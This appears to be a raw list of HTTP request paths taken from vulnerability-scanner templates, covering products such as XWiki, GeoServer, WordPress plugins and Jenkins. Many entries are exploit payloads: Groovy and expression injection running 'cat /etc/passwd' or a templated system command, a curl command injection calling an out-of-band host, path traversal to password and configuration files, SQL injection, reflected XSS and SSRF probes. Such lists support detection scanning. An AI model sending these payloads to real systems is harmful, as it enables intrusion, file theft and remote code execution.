
/dana-na/auth/url_default/welcome.cgi
/unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css
/dana-na/auth/url_6/welcome.cgi
/dana/home/index.cgi
/goanywhere/license/Unlicensed.xhtml/{{string}}?javax.faces.ViewState={{string}}&GARequestAction=activate
/license/Unlicensed.xhtml/{{string}}?javax.faces.ViewState={{string}}&GARequestAction=activate
/wp-json/mcp/v1
/query
/jsonpath
/api/query
/data
/parse
/filter
/expression
/nmc/rpc/log_getfile
/storage/filesvr.dn?t={{ticket}}
/posts?authorMatch={
/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d%20
/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d%20
/images/index.html?id=%24%7B%40print_r%28%40system%28%22{{command}}%22%29%29%7D
{{endpoints}}
/geoserver/wfs?service=WFS&request=GetCapabilities
/geoserver/ows?service=WFS&request=GetCapabilities
/wfs?service=WFS&request=GetCapabilities
/ows?service=WFS&request=GetCapabilities
/geoserver/wfs?service=WFS
/geoserver/ows?service=WFS
/wfs?service=WFS
/ows?service=WFS
/xwiki/rest/liveData/sources/liveTable/entries?sourceParams.template=getdeleteddocuments.vm&sort=injected
/mftp/
/
/misc/`curl${IFS}{{interactsh-url}}`/..;/index.html
/locales/locale.json?locale=..%2F..%2Fconfig&namespace=app
{{js}}
/sse?transportType=stdio&command=echo&args[]=hello-from-brower
/webapi/ping
/pbxcore/files/cache/{{extracted_path}}?{{wait_for(3)}}
/admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x
/fog/management/index.php?node=about&sub=kernel
/fog/service/getversion.php?url={{interactsh-url}}
/hx/resources/public/$SCHEMAS$?Filename=c%3a%5cwindows%5cwin.ini
/index.php?mod=textviewer&src=file:///etc/passwd
/trufusionPortal/jsp/internal_admin_contact_login.jsp
/unified-console.html
/controlloLogin.js
/{{path}}
/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd
/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd
/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+547653*865674+as+id
/contact/
/contact-us/
/submit/
/support/
/form/
/get-in-touch/
/wp-admin/admin-ajax.php
/wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/readme.txt
/tileserver.php/x/1/1/1?Format=/../../../../../../../../../../../../../../etc/passwd&Request=x&layer=.
/?PagePrincipale/upload&file=%22%3E%3Csvg/onload=alert(document.domain)%3E
/auth/failure?provider={{redirect_payload}}
/auth/failure?provider={{basic_xss}}
/xwiki/rest/wikis/xwiki/search?q=test&scope=title&orderField=doc.fullName%20from%20XWikiDocument%20as%20doc%20where%20%24%24%3D%27%24%24%3Dconcat(chr(61)%2Cchr(39))%20and%20version()%7C%7Cpg_sleep(1)%3Dversion()%7C%7Cpg_sleep(1)%20and%20(1%3D1%20or%20%3F%3D%3F%20or%20%3F%3D%3F%20or%20%3F%3D%3F%20or%20%3F%3D%3F%20or%20%3F%3D%3F)%20--%20comment%27%20or%20a%3D%27%20order%20by%20doc.fullName
/{{js_file_url}}
{{path}}
/download_work_dir_file?path=/etc/passwd
/xwiki/webjars/wiki%3Axwiki/..%2F..%2F..%2F..%2F..%2FWEB-INF%2Fxwiki.cfg
/bin/ssx/Main/WebHome?resource=../../WEB-INF/xwiki.cfg&minify=false
/webapps/xwiki/WEB-INF/xwiki.properties
/_image?href=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg&f=svg
/geoserver/wfs?service=WMS&request=GetMap
/wfs?service=WMS&request=GetMap
/wp-json/atarim/v1/db/vc
/h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml
/../package.json
/api/v1/search?key=%27%20and%20extractvalue(1,concat(0x7e,%27{{rstr}}%27,0x7e))--%20a
/cms/collect/getArticle
/api/v1/getbaseconfig
/extensions/realestate/index.php/properties/list/list-with-sidebar/realties?option=com_jux_real_estate&view=realties&Itemid=6wdv%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ewz8nu&title=&price_slider_lower=63752&price_slider_upper=400000&area_slider_lower=30&area_slider_upper=400&type_id=2&cat_id=8&country_id=73&locstate=187&beds=1&agent_id=112&baths=1&jp_yearbuilt=&button=Search
/extensions/realestate/index.php/properties/list/list-with-sidebar/realties?option=com_jux_real_estate&view=realties&Itemid=148&title=&price_slider_lower=63752&price_slider_upper=400000&area_slider_lower=30&area_slider_upper=400&type_id=2&cat_id=8&country_id=73&locstate=187&beds=1&agent_id=112&baths=1&jp_yearbuilt=mzbpj%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3eflmo8&button=Search
/api/kernels
/unsafe/plain/http://{{interactsh-url}}
/login.jsp?onlyOnePerVM=hebing%27%3E%3Csvg%20onload=alert(document.domain)%3E
/login.jsp?redirect=hebing%27%3E%3Csvg%20onload=alert(document.domain)%3E
/login.jsp?nodeid=hebing%27%3E%3Csvg%20onload=alert(document.domain)%3E
/index.jsp
/menu.jsp?flag=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/help/systop.jsp?langcode=1%22%3E%3Csvg%20onload=alert(document.domain)%3E
/help/systop.jsp?langcode=1%22%3E%3C/script%3E%3Csvg%20onload=alert(document.domain)%3E
/help/top.jsp?langcode=1%22%3E%3Csvg%20onload=alert(document.domain)%3E
/help/top.jsp?langcode=1%22%3E%3C/script%3E%3Csvg%20onload=alert(document.domain)%3E
/rest.html
/geoserver/rest.html
/js/zimbraMail/share/model/ZmSettings.js
/api/BetterImageGallery/imagehandler?path=../../../Web.Config
/etc/passwd?raw
/C:/Windows/System32/drivers/etc/hosts?raw
/etc/passwd?.svg?.wasm?init
/xwiki/bin/view/Main/?foo=bar&foo_syntax=invalid&RequiresHTMLConversion=foo&xerror=https://oast.me
/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(document.domain)%3C/script%3E&mimetype=text/html
/%2f%5c%2foast.pro%2f..
/?profile=</script><script>alert(document.domain)</script>
/wp-json/wp/v2/users
/wp-json/wp/v2/users?foo=simple-jwt-login
/o/marketplace-app-manager-web/icon.jsp?iconURL=https:///%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E
/tileserver.php/wmts/x/1/1/asd?Request=x&layer=%3Csvg+alert(document.domain)%3E
/?BazaR&vue=formulaire&action=confirm_delete&idformulaire=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
/loginok.html
/{{paths}}/
/?ru&filter=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
/commandcenter/publicLink.do
/?cb={{cache-buster}}
/securityRealm/signup
/jenkins/securityRealm/signup
/wp-content/plugins/qwiz-online-quizzes-and-flashcards/qwiz_admin_sample_buttons.php?theme_stylesheet=\
/console/api/system-features
/bin/view/AppWithinMinutes/DeleteApplication?appName=Help.Applications.Contributors&resolve=true&xredirect=%2fbin%2fview%2fHelp%2fApplications%2fContributors%2f
/xwiki/bin/view/AppWithinMinutes/DeleteApplication?appName=Help.Applications.Contributors&resolve=true&xredirect=%2fbin%2fview%2fHelp%2fApplications%2fContributors%2f
/wp-json/tribe/events/v1/organizers
/wp-json/tribe/events/v1/venues
/wp-content/uploads/fifu-plugin.log
/wp-content/uploads/fifu-cloud.log
/urve/site/login.html?lang=en
/_internal/redirect.php?url=http://{{interactsh-url}}
/displays/nuclei_check.json
/user/login
/_image?href=//{{interactsh-url}}/600x400
/login_ok.htm
/{{path}}?javax.servlet.include.servlet_path=/WEB-INF/web.xml
/{{trim_prefix(update_uri,
/helpdesk/WebObjects/Helpdesk.woa
/helpdesk/WebObjects/Helpdesk.woa/wo/bogus.wo/{{wosid}}/1.0?badparam=/ajax/&wopage=LoginPref
/{{externalAuthContainer}}
/helpdesk/WebObjects/Helpdesk.woa/wo/{{jsonrpc_endpoint}}
/wp-json/lp/v1/load_content_via_ajax
/wp-content/plugins/1-click-migration/ocm_debug.log
/wp-json/wp/v2/pages?per_page=100
/wp-json/lp/v1/orders/statistic
